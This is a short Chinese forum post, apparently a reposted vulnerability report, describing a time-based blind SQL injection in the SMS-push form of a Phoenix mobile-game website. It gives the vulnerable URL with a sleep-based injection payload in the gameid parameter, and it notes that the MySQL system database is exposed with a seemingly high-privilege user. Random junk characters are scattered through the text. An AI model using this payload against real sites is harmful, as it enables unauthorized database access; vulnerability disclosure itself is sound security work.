简要描述:% m. N4 d, Z8 x! O! Q0 R9 D* m3 m n/ w H
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。" _1 ]; _ n4 R/ l* U7 K/ z
2 E' S) V' C3 H- P E3 M' Q* ~
详细说明:
# J6 ?% S- ~0 P' i存在SQL盲注url:. _) b4 F2 m! v( I; M6 F
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1, R* B) r5 [1 G2 i9 Q' m( N5 \5 y. @) g
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png |" [& Y& Q. Y. ^/ w% ~4 c
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
/ Q2 a L- g5 f( Thttp://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
! X' s O- O8 ^: B; P" a1 `1 l% M+ w! b6 T7 S3 ]
能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对